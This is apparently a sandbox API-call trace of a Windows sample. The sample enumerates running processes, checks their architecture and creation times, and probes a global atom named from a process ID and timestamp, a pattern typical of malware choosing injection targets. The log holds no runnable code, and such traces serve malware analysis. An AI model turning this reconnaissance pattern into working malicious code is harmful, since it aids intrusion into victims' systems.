	[0084.375] CloseHandle (hObject=0x674) returned 1
	[0084.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x674
	[0084.375] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.375] CloseHandle (hObject=0x674) returned 1
	[0084.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x674
	[0084.375] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.375] CloseHandle (hObject=0x674) returned 1
	[0084.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396ea50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x674
	[0084.376] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.376] CloseHandle (hObject=0x674) returned 1
	[0084.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396e7f0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x674
	[0084.376] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.376] CloseHandle (hObject=0x674) returned 1
	[0084.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c8e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x674
	[0084.376] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.376] CloseHandle (hObject=0x674) returned 1
	[0084.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396ea50, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x674
	[0084.412] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.412] CloseHandle (hObject=0x674) returned 1
	[0084.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39a1a60, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x674
	[0084.412] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.412] CloseHandle (hObject=0x674) returned 1
	[0084.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396e750, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x674
	[0084.416] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.417] CloseHandle (hObject=0x674) returned 1
	[0084.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x674
	[0084.417] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.417] CloseHandle (hObject=0x674) returned 1
	[0084.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x674
	[0084.417] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.417] CloseHandle (hObject=0x674) returned 1
	[0084.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396e8b0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x674
	[0084.417] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.417] CloseHandle (hObject=0x674) returned 1
	[0084.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396e7d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x674
	[0084.418] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.418] CloseHandle (hObject=0x674) returned 1
	[0084.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397eab8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x674
	[0084.418] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.418] CloseHandle (hObject=0x674) returned 1
	[0084.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x674
	[0084.418] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.418] CloseHandle (hObject=0x674) returned 1
	[0084.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39a1cb8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x674
	[0084.418] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.418] CloseHandle (hObject=0x674) returned 1
	[0084.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x674
	[0084.419] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.419] CloseHandle (hObject=0x674) returned 1
	[0084.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x674
	[0084.419] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.419] CloseHandle (hObject=0x674) returned 1
	[0084.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396ea50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x674
	[0084.420] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.420] CloseHandle (hObject=0x674) returned 1
	[0084.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397eab8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x674
	[0084.421] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.421] CloseHandle (hObject=0x674) returned 1
	[0084.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396e7d0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x674
	[0084.422] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.422] CloseHandle (hObject=0x674) returned 1
	[0084.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39a1c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x674
	[0084.422] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.422] CloseHandle (hObject=0x674) returned 1
	[0084.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39a1c90, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x674
	[0084.423] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.423] CloseHandle (hObject=0x674) returned 1
	[0084.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397ea88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x674
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.423] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetLastError () returned 0x5
	[0084.424] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.425] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.425] GetProcessTimes (in: hProcess=0x674, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] wsprintfA (in: param_1=0x3971bd8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.425] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.426] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetLastError () returned 0x5
	[0084.427] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.427] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.427] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.427] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.428] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.428] CloseHandle (hObject=0x674) returned 1
	[0084.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x674
	[0084.428] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.428] CloseHandle (hObject=0x674) returned 1
	[0084.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e9b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16de0) returned 0xc0000004
	[0084.477] VirtualAlloc (lpAddress=0x0, dwSize=0x16ee0, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0084.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x16ee0, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0084.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397e8c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397eab8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397e9c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397eab8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0084.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c7c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
